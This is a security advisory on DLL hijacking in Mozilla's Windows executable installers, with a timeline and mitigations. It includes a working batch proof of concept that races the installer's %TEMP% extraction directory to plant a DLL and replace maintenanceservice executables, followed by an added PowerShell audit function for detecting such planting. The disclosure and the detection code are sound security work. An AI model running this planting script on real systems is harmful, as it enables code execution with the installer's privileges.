Mozilla Firefox DLL Hijacking

2016.06.16
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 6.9/10
Impact Subscore: 10/10
Exploitability Subscore: 3.4/10
Exploit range: Local
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Hi @ll,

<https://bugzilla.mozilla.org/show_bug.cgi?id=961676> should have fixed
CVE-2014-1520 in Mozilla's executable installers for Windows ... but does NOT!

JFTR: this type of vulnerability (really: a bloody stupid trivial beginner's
error!) is well-known and well-documented as
<https://cwe.mitre.org/data/definitions/379.html>.

Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
   "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe" and save
   them in an arbitrary directory;

1. download <http://home.arcor.de/skanthak/download/SHFOLDER.DLL> plus
   <http://home.arcor.de/skanthak/download/SENTINEL.EXE> and save them in
   an(other) arbitrary directory;

2. start your editor, copy and paste the following 10 lines and save them
   as "POC.CMD" in the same directory as "SHFOLDER.DLL" and "SENTINEL.EXE"
   downloaded in step 1:

   :WAIT1
   @If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1
   For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%!
   Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll"
   :WAIT2
   @If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2
   Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe"
   :WAIT3
   @If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3
   Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe"

3. execute the batch script "POC.CMD" created in step 2;

4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
   "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
   downloaded in step 0 and proceed as directed: notice the message boxes
   displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE" placed by
   the batch script started in step 3 in the unsafe TEMP subdirectory
   created by Mozilla's vulnerable executable installers!

PWNED!

Mitigation(s):
~~~~~~~~~~~~~~

0. don't use executable installers. DUMP THEM, NOW!

1. see <http://home.arcor.de/skanthak/!execute.html> as well as
   <http://home.arcor.de/skanthak/SAFER.html>.

2. stay away from Mozilla's vulnerable installers for their Windows software
   (at least until Mozilla starts to develop a sense for the safety and
   security of their users).

stay tuned
Stefan Kanthak

Timeline:
~~~~~~~~~

2015-10-25  <https://bugzilla.mozilla.org/show_bug.cgi?id=1218199>
            not even an attempt to fix this vulnerability
            (check but <https://blog.mozilla.org/blog/2015/10/23/mozilla-launches-open-source-support-program/>)

2016-04-30  <https://bugzilla.mozilla.org/show_bug.cgi?id=1269111>
            <https://bugzilla.mozilla.org/show_bug.cgi?id=1269113>
            <https://bugzilla.mozilla.org/show_bug.cgi?id=1269122>
            <https://bugzilla.mozilla.org/show_bug.cgi?id=1269123>
            <https://bugzilla.mozilla.org/show_bug.cgi?id=1269142>
            <https://bugzilla.mozilla.org/show_bug.cgi?id=1269144>
            not even an attempt to fix this vulnerability
            (check but <https://blog.mozilla.org/blog/2016/06/09/help-make-open-source-secure/>)

2016-06-15  deadline expired after 45 days, report published
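The advisory above turns three weaknesses of a self-extracting installer into a PoC: a DLL dropped next to the unpacked setup program shadows the System32 copy of the same name (SHFOLDER.DLL), an unsigned executable replaces one the installer later runs with higher privileges (maintenanceservice.exe), and the extraction directory under %TEMP% lets other processes write into it first (CWE-379). The PowerShell function below is an added, defender-side example written for this page; it is not part of Stefan Kanthak's post and not Mozilla's code. It audits a directory an installer has unpacked into for those three conditions using only built-in cmdlets (Get-ChildItem, Get-AuthenticodeSignature, Get-Acl). The expected publisher string and the list of principals that are allowed to hold write access are assumptions chosen for the example and should be adjusted to the vendor and environment being checked.

```powershell
# Added example, not from the advisory or from Mozilla's installers.
# Audits a directory that an executable installer unpacked into (for example
# %TEMP%\7z*.tmp) for the planting patterns described in the advisory.
function Test-UnpackedInstallerDir {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Path,
        # Assumed publisher; replace with the CN of the vendor being verified.
        [string] $ExpectedPublisher = 'Mozilla Corporation',
        # Assumed set of principals that may legitimately hold write access.
        [string[]] $TrustedWriters = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')
    )

    $findings = [System.Collections.Generic.List[object]]::new()
    $system32 = Join-Path $env:SystemRoot 'System32'

    # 1. DLLs that shadow a DLL of the same name in System32: the default DLL
    #    search order makes the unpacked setup program load the local copy first.
    foreach ($dll in Get-ChildItem -Path $Path -Recurse -Filter '*.dll' -File) {
        if (Test-Path -Path (Join-Path $system32 $dll.Name)) {
            $sig = Get-AuthenticodeSignature -FilePath $dll.FullName
            $findings.Add([pscustomobject]@{
                File   = $dll.FullName
                Issue  = 'shadows a System32 DLL'
                Status = $sig.Status
                Signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
            })
        }
    }

    # 2. Executables whose Authenticode signature is missing, broken, or not
    #    from the expected publisher (the PoC swaps maintenanceservice.exe and
    #    maintenanceservice_installer.exe for an unsigned stand-in).
    foreach ($exe in Get-ChildItem -Path $Path -Recurse -Filter '*.exe' -File) {
        $sig = Get-AuthenticodeSignature -FilePath $exe.FullName
        $subject = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
        if ($sig.Status -ne 'Valid' -or $subject -notlike "*CN=$ExpectedPublisher*") {
            $findings.Add([pscustomobject]@{
                File   = $exe.FullName
                Issue  = 'signature not valid or not from expected publisher'
                Status = $sig.Status
                Signer = $subject
            })
        }
    }

    # 3. CWE-379: any principal other than the owner and the trusted writers
    #    that holds write rights on the directory can plant files ahead of
    #    the installer. FileSystemRights::Write is a bit mask, so -band tests
    #    whether any write-class right is present.
    $acl = Get-Acl -Path $Path
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write
    foreach ($ace in $acl.Access) {
        $who = $ace.IdentityReference.Value
        if ($ace.AccessControlType -eq 'Allow' -and
            (($ace.FileSystemRights -band $writeMask) -ne 0) -and
            $who -ne $acl.Owner -and $who -notin $TrustedWriters) {
            $findings.Add([pscustomobject]@{
                File   = $Path
                Issue  = "directory writable by $who"
                Status = ''
                Signer = ''
            })
        }
    }

    return $findings
}

# Usage: check every 7-Zip SFX extraction directory currently present in %TEMP%.
Get-ChildItem -Path "$env:TEMP\7z*.tmp" -Directory |
    ForEach-Object { Test-UnpackedInstallerDir -Path $_.FullName } |
    Format-Table -AutoSize
```

An empty result means nothing in the directory shadows a system DLL, every executable carries a valid signature from the expected publisher, and only the owner and trusted principals can write there. Note that the advisory's PoC runs as the same user who launches the installer, so the ACL check alone would not flag it; the signature and DLL-shadowing checks are what catch files planted from a process running under that same account.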


Copyright 2024, cxsecurity.com